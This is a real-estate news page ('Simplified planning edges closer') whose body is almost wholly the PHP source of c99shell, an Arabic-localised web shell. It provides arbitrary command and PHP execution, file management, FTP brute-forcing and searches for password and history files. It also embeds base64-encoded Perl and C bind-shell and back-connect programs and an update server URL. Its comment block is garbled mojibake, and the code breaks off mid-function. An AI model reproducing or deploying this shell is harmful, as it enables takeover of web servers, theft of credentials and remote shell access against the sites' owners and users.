Home About us Agents Latest Property News FAQs Contact Support

Search

Simplified planning edges closer

Property Week via Google

<?php

/*

******************************************************************************************************

*

*                                        c99shell.php *                                                        Freeware license.

*                                                              *  c99shell - ôàéë-ىهيهنوهً ÷هًهç www-لًîَçهً, "çàٍî÷هيûé" نëے âçëîىà.

*  آû ىîوهٍه لهٌïëàٍيî ٌêà÷àٍü ïîٌëهني‏‏ âهًٌè‏ يà نîىàّيهé ًٌٍàيè÷êه ïًîنَêٍà:

   

*

*  WEB: www.google.com

*  ICQ UIN #: 656555

*

*  خٌîلهييîٌٍè:

*  + َïًàâëهيèه ëîêàëüيûىè è َنàëهييûىè (ftp, samba *) ôàéëàىè/ïàïêàىè, ٌîًٍèًîâêà

*    çàêà÷èâàيèه ٌêà÷èâàيèه ôàéëîâ è ïàïîê

*    (ïًهنâîًèٍهëüيî َïàêîâûâàهٌٍے/ًàٌïàêîâûâàهٌٍے ÷هًهç tar *)

*    ïًîنâèيٍَûé ïîèٌê (âîçىîوهي âيًٍَè ôàéëîâ)

*    modify-time è access-time َ ôàéëîâ يه ىهيے‏ٌٍے ïًè ًهنàêٍèًîâàيèè (âûêë./âêë. ïàًàىهًٍîى $filestealth)

*  + ïًîنâèيٍَûé SQL-ىهيهنوهً يه ٌٍََïà‏ùèé phpmyadmin,

     ïًîٌىîًٍ/ٌîçنàيèه/ًهنàêٍèًîâàيèه ءؤ/ٍàلëèِ, ïًîٌىîًٍ ôàéëîâ ÷هًهç لًهّü â mysql

*  + َïًàâëهيèه ïًîِهٌٌàىè unix-ىàّèيû.

*  + َنîليîه (èيîمنà مًàôè÷هٌêîه) âûïîëيهيèه shell-êîىàين (ىيîمî àëèàٌîâ, ىîويî ًهنàêٍèًîâàٍü)

*  + âûïîëيهيèه ïًîèçâîëüيîمî PHP-êîنà

*  + êîنèًîâùèê نàييûُ ÷هًهç md5, unix-md5, sha1, crc32, base64

*  + لûًٌٍûé ëîêàëüيûé àيàëèç لهçîïàٌيîٌٍè خر

*  + لûًٌٍîه ftp-ٌêàيèًîâàيèه يà ٌâےçêè login;login èç /etc/passwd (îلû÷يî نàهٍ نîٌٍَï ê 1/100 àêêàَيٍîâ)

*    ïîًٌٍàيè÷يûé âûâîن, ٌîًٍèًîâêà, مًَïïîâûه îïهًàِèè يàن ءؤ/ٍàلëèِàىè, َïًàâëهيèه ïًîِهٌٌàىè SQL)

*  + ٌêًèïٍ "ë‏لèٍ" include: àâٍîىàٍè÷هٌêè èùهٍ ïهًهىهييûه ٌ نهٌêًèïٍîًàىè è âٌٍàâëےهٍ èُ â ٌٌûëêè (îïِèàëüيî)

     ٍàêوه ىîويî èçىهيèٍü $surl (لàçîâàے ٌٌûëêà) êàê ÷هًهç êîيôèمًَàِè‏ (ïًèيَنèٍهëüيî) ٍàê è ÷هًهç cookie "c99sh_surl",

     èنهٍ àâٍî-çàïèٌü çيà÷هيèے $set_surl â cookie "set_surl"

*  + âîçىîويîٌٍü "çàلèينèٍü" /bin/bash يà îïًهنهëهييûé ïîًٍ ٌ ïًîèçâîëüيûى ïàًîëهى,

*    èëè ٌنهëàٍü back connect (ïًîèçâîنèٌٍے ٍهٌٍèًîâàيèه ٌîهنهيهيèے, è âûâîنےٌٍے ïàًàىهًٍû نëے çàïٌَêà NetCat).

*  + âîçىîويîٌٍü لûًٌٍîمî ٌàىî-َنàëهيèے ٌêًèïٍà

*  + àâٍîىàٍèçèًîâàيàے îٍïًàâêà ٌîîلùهيèé î يهنîًàلîٍêàُ è ïîوهëàيèé àâٍîًَ (÷هًهç mail())


*  * - ٌَïهُ ïîëيîٌٍü‏ çàâèٌèٍ îٍ êîيôèمًَàِèè PHP

*

*        آ îلùهى يَويî َâèنهٍü âٌ¸ ‎ٍî!

*

*   خوèنàهىûه èçىهيهيèے:

*  ~ ذàçâèٍèه sql-ىهيهنوهًà

*  ~ ؤîلàâëهيèه يهنîٌٍà‏ùèُ ًàٌّèًهيèé ôàéëîâ

*

*  ~-~ دèّèٍه îلî âٌهُ يàéنهيûُ يهنîًàلîٍêàُ, وهëàهىûُ èçىهيهيèےُ è نîًàلîٍêàُ (نàوه î ٌàىûُ يهçيà÷èٍهëüيûُ!)

       â ICQ UIN #656555 ëèلî ÷هًهç ًàçنهë "feedback", لَنٍَ ًàٌٌىîًٍهيû âٌه ïًهنëîوهيèے è ïîوهëàيèے.

*

*  Last modify: 3.07.2005

*

*  © Golden-z3ro. ©oded by Golden-z3ro

*

******************************************************************************************************

*/

//Starting calls

if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}

error_reporting(5);

@ignore_user_abort(true);

@set_magic_quotes_runtime(0);

$win = strtolower(substr(PHP_OS, 0, 3)) == "win";

define("starttime",getmicrotime());

if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}

$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);

foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}


$shver = ""; //Current version

//CONFIGURATION AND SETTINGS

if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}

elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}

else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL

}


$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.


if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}

if (empty($surl))

{

 $surl = "?".$includestr; //Self url

}

$surl = htmlspecialchars($surl);


$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.


//Authentication

$login = ""; //login

//DON'T FORGOT ABOUT PASSWORD!!!

$pass = ""; //password

$md5_pass = ""; //md5-cryped pass. if null, md5($pass)


if (stristr($_SERVER["GATEWAY_INTERFACE"],"cgi")) {$login = "";} // If CGI then turn off auth.


$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")

$login_txt = "Restricted area"; //http-auth message.

$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";


$gzipencode = true; //Encode with gzip?


$autoupdate = false; //Automatic updating?


$updatenow = false; //If true, update now (this variable will be false)


$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server


$filestealth = true; //if true, don't change modify&access-time


$donated_html = "<center><b>;

تم تعريب الشل من طرف منظمة الحرباء | comix <span

class=SpellE>;</b></center>";

                /* If you publish free shell and you wish

                add link to your site or any other information,

                put here your html. */

$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.


$curdir = "./"; //start folder

//$curdir = getenv("DOCUMENT_ROOT");

$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)

$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)


$log_email = "user@host.tld"; //Default e-mail for sending logs


$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending

$sort_save = true; //If true then save sorting-type.


// Registered file-types.

//  array(

//   "{action1}"=>array("ext1","ext2","ext3",...),

//   "{action2}"=>array("ext4","ext5","ext6",...),

//   ...

//  )

$ftypes  = array(

 "html"=>array("html","htm","shtml"),

 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),

 "exe"=>array("sh","install","bat","cmd"),

 "ini"=>array("ini","inf"),

 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),

 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),

 "sdb"=>array("sdb"),

 "phpsess"=>array("sess"),

 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")

);


// Registered executable file-types.

//  array(

//   string "command{i}"=>array("ext1","ext2","ext3",...),

//   ...

//  )

//   {command}: %f% = filename

$exeftypes  = array(

 getenv("PHPRC")." %f%"=>array("php","php3","php4"),

);


/* Highlighted files.

  array(

   i=>array({regexp},{type},{opentag},{closetag},{break})

   ...

  )

  string {regexp} - regular exp.

  int {type}:

        0 - files and folders (as default),

        1 - files only, 2 - folders only

  string {opentag} - open html-tag, e.g. "<b>" (default)

  string {closetag} - close html-tag, e.g. "</b>" (default)

  bool {break} - if true and found match then break

*/

$regxp_highlight  = array(

  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example

  array("config.php",1) // example

);


$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.

                                                                         // array (i=>{letter} ...); string {letter} - letter of a drive

//$safemode_diskettes = range("a","z");

$hexdump_lines = 8;        // lines in hex preview file

$hexdump_rows = 24;        // 16, 24 or 32 bytes in one line


$nixpwdperpage = 100; // Get first N lines from /etc/passwd


$bindport_pass = "c99";          // default password for binding

$bindport_port = "31373"; // default port for binding

$bc_port = "31373"; // default port for back-connect


// Command-aliases

if (!$win)

{

 $cmdaliases = array(

  array("-----------------------------------------------------------", "ls -la"),

  array("العثور على جميع الملفات SUID", "find / -type f -perm -04000 -ls"),

  array("العثور على ملفات SUID في الدليل الحالي", "find . -type f -perm -04000 -ls"),

  array("العثور على جميع الملفات SGID", "find / -type f -perm -02000 -ls"),

  array("العثور على ملفات SGID في الدليل الحالي", "find . -type f -perm -02000 -ls"),

  array("العثور على ملفات config.inc.php", "find / -type f -name config.inc.php"),

  array("find config* files", "find / -type f -name \"config*\""),

  array("find config* files in current dir", "find . -type f -name \"config*\""),

  array("العثور على كل المجلدات والملفات للكتابة", "find / -perm -2 -ls"),

  array("العثور على جميع المجلدات والملفات للكتابة في دير الحالي", "find . -perm -2 -ls"),

  array("العثور على جميع الملفات service.pwd", "find / -type f -name service.pwd"),

  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),

  array("find all .htpasswd files", "find / -type f -name .htpasswd"),

  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),

  array("find all .bash_history files", "find / -type f -name .bash_history"),

  array("العثور على جميع الملفات .bash_history", "find . -type f -name .bash_history"),

  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),

  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),

  array("list file attributes on a Linux second extended file system", "lsattr -va"),

  array("show opened ports", "netstat -an | grep -i listen")

 );

}

else

{

 $cmdaliases = array(

  array("-----------------------------------------------------------", "dir"),

  array("إظهار المنافذ المفتوحة", "netstat -an")

 );

}


$sess_cookie = "c99shvars"; // Cookie-variable name


$usefsbuff = true; //Buffer-function

$copy_unset = false; //Remove copied files from buffer after pasting


//Quick launch

$quicklaunch = array(

 array("<img src=\"".$surl."act=img&img=home\" alt=\"الصفحة الرئيسة\" height=\"20\" width=\"20\" border=\"0\">",$surl),

 array("<img src=\"".$surl."act=img&img=back\" alt=\"رجوع\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),

 array("<img src=\"".$surl."act=img&img=forward\" alt=\"تقدم\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),

 array("<img src=\"".$surl."act=img&img=up\" alt=\"أعلى\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),

 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"تحديث\" height=\"20\" width=\"17\" border=\"0\">",""),

 array("<img src=\"".$surl."act=img&img=search\" alt=\"بحث\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),

 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"الحاجز\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),

 array("<b>المشفر</b>",$surl."act=encoder&d=%d"),

 array("<b>إتصال عكسي</b>",$surl."act=bind&d=%d"),

 array("<b>Proc.</b>",$surl."act=processes&d=%d"),

 array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),

 array("<b>الحماية</b>",$surl."act=security&d=%d"),

 array("<b>SQL</b>",$surl."act=sql&d=%d"),

 array("<b>PHP-code</b>",$surl."act=eval&d=%d"),

 array("<b>تحديث النسخة</b>",$surl."act=update&d=%d"),

 array("<b>ملاحضات</b>",$surl."act=feedback&d=%d"),

 array("<b>حدف الشل</b>",$surl."act=selfremove"),

 array("<b>خروج</b>","#\" onclick=\"if (confirm('هل أنت متأكد من تسجيل الخروج')) window.close()")

);


//Highlight-code colors

$highlight_background = "#c0c0c0";

$highlight_bg = "#FFFFFF";

$highlight_comment = "#6A6A6A";

$highlight_default = "#0000BB";

$highlight_html = "#1300FF";

$highlight_keyword = "#007700";

$highlight_string = "#000000";


@$f = $_REQUEST["f"];

@extract($_REQUEST["c99shcook"]);


//END CONFIGURATION



//                                 \/        Next code isn't for editing        \/

@set_time_limit($timelimit);

$tmp = array();

foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}

$s = "!^(".implode("|",$tmp).")$!i";

if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}

if (!empty($login))

{

 if(empty($md5_pass)) {$md5_pass = md5($pass);}

 if (($_SERVER["PHP_AUTH_USER"] != $login ) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))

 {

  if ($login_txt === "") {$login_txt = "";}

  elseif (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}

  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");

  header("HTTP/1.0 401 Unauthorized");

  exit($accessdeniedmess);

 }

}

if ($act != "img")

{

$lastdir = realpath(".");

chdir($curdir);

if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}

$sess_data = unserialize($_COOKIE["$sess_cookie"]);

if (!is_array($sess_data)) {$sess_data = array();}

if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}

if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}


if (!function_exists("c99_buff_prepare"))

{

function c99_buff_prepare()

{

 global $sess_data;

 global $act;

 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}

 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}

 $sess_data["copy"] = array_unique($sess_data["copy"]);

 $sess_data["cut"] = array_unique($sess_data["cut"]);

 sort($sess_data["copy"]);

 sort($sess_data["cut"]);

 if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}

 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}

}

}

c99_buff_prepare();

if (!function_exists("c99_sess_put"))

{

function c99_sess_put($data)

{

 global $sess_cookie;

 global $sess_data;

 c99_buff_prepare();

 $sess_data = $data;

 $data = serialize($data);

 setcookie($sess_cookie,$data);

}

}

foreach (array("sort","sql_sort") as $v)

{

 if (!empty($_GET[$v])) {$$v = $_GET[$v];}

 if (!empty($_POST[$v])) {$$v = $_POST[$v];}

}

if ($sort_save)

{

 if (!empty($sort)) {setcookie("sort",$sort);}

 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}

}

if (!function_exists("str2mini"))

{

function str2mini($content,$len)

{

 if (strlen($content) > $len)

 {

  $len = ceil($len/2) - 2;

  return substr($content, 0,$len)."...".substr($content,-$len);

 }

 else {return $content;}

}

}

if (!function_exists("view_size"))

{

function view_size($size)

{

 if (!is_numeric($size)) {return false;}

 else

 {

  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

  else {$size = $size . " B";}

  return $size;

 }

}

}

if (!function_exists("fs_copy_dir"))

{

function fs_copy_dir($d,$t)

{

 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

 $h = opendir($d);

 while (($o = readdir($h)) !== false)

 {

  if (($o != ".") and ($o != ".."))

  {

   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}

   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}

   if (!$ret) {return $ret;}

  }

 }

 closedir($h);

 return true;

}

}

if (!function_exists("fs_copy_obj"))

{

function fs_copy_obj($d,$t)

{

 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);

 if (!is_dir(dirname($t))) {mkdir(dirname($t));}

 if (is_dir($d))

 {

  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}

  return fs_copy_dir($d,$t);

 }

 elseif (is_file($d)) {return copy($d,$t);}

 else {return false;}

}

}

if (!function_exists("fs_move_dir"))

{

function fs_move_dir($d,$t)

{

 $h = opendir($d);

 if (!is_dir($t)) {mkdir($t);}

 while (($o = readdir($h)) !== false)

 {

  if (($o != ".") and ($o != ".."))

  {

   $ret = true;

   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}

   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}}

   if (!$ret) {return $ret;}

  }

 }

 closedir($h);

 return true;

}

}

if (!function_exists("fs_move_obj"))

{

function fs_move_obj($d,$t)

{

 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);

 if (is_dir($d))

 {

  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}

  return fs_move_dir($d,$t);

 }

 elseif (is_file($d))

 {

  if(copy($d,$t)) {return unlink($d);}

  else {unlink($t); return false;}

 }

 else {return false;}

}

}

if (!function_exists("fs_rmdir"))

{

function fs_rmdir($d)

{

 $h = opendir($d);

 while (($o = readdir($h)) !== false)

 {

  if (($o != ".") and ($o != ".."))

  {

   if (!is_dir($d.$o)) {unlink($d.$o);}

   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}

  }

 }

 closedir($h);

 rmdir($d);

 return !is_dir($d);

}

}

if (!function_exists("fs_rmobj"))

{

function fs_rmobj($o)

{

 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);

 if (is_dir($o))

 {

  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}

  return fs_rmdir($o);

 }

 elseif (is_file($o)) {return unlink($o);}

 else {return false;}

}

}

if (!function_exists("myshellexec"))

{

function myshellexec($cmd)

{

 $result = "";

 if (!empty($cmd))

 {

  if (is_callable("exec")) {exec($cmd,$result); $result = join("\n",$result);}

  elseif (($result = `$cmd`) !== false) {}

  elseif (is_callable("system")) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

  elseif (is_callable("passthru")) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

  elseif (is_resource($fp = popen($cmd,"r")))

  {

   $result = "";

   while(!feof($fp)) {$result .= fread($fp,1024);}

   pclose($fp);

  }

 }

 return $result;

}

}

if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}

if (!function_exists("view_perms"))

{

function view_perms($mode)

{

 if (($mode & 0xC000) === 0xC000) {$type = "s";}

 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}

 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}

 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}

 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}

 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}

 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}

 else {$type = "?";}


 $owner["read"] = ($mode & 00400)?"r":"-";

 $owner["write"] = ($mode & 00200)?"w":"-";

 $owner["execute"] = ($mode & 00100)?"x":"-";

 $group["read"] = ($mode & 00040)?"r":"-";

 $group["write"] = ($mode & 00020)?"w":"-";

 $group["execute"] = ($mode & 00010)?"x":"-";

 $world["read"] = ($mode & 00004)?"r":"-";

 $world["write"] = ($mode & 00002)? "w":"-";

 $world["execute"] = ($mode & 00001)?"x":"-";


 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}

 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}

 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}


 return $type.$owner["read"].$owner["write"].$owner["execute"].

        $group["read"].$group["write"].$group["execute"].

        $world["read"].$world["write"].$world["execute"];

}

}

if (!function_exists("parse_perms"))

{

function parse_perms($mode)

{

 if (($mode & 0xC000) === 0xC000) {$t = "s";}

 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}

 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}

 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}

 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}

 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}

 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}

 else {$t = "?";}

 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;

 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;

 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;

 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);

}

}

if (!function_exists("parsesort"))

{

function parsesort($sort)

{

 $one = intval($sort);

 $second = substr($sort,-1);

 if ($second != "d") {$second = "a";}

 return array($one,$second);

}

}

if (!function_exists("view_perms_color"))

{

function view_perms_color($o)

{

 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}

 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}

 else {return "<font color=green>".view_perms(fileperms($o))."</font>";}

}

}

if (!function_exists("c99getsource"))

{

function c99getsource($fn)

{

 if ($fn == "c99sh_bindport.pl") {return base64_decode(

"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".

"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".

"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".

"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".

"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".

"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".

"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".

"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".

"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".

"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9");}

 elseif ($fn == "c99sh_bindport.c") {return base64_decode(

"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".

"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".

"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".

"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".

"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".

"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".

"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".

"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".

"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".

"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".

"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".

"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".

"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".

"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".

"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".

"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".

"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".

"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".

"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".

"fQ==");}

 elseif ($fn == "c99sh_backconn.pl") {return base64_decode(

"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".

"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".

"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".

"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".

"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".

"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".

"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".

"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".

"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".

"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==");}

 elseif ($fn == "c99sh_backconn.c") {return base64_decode(

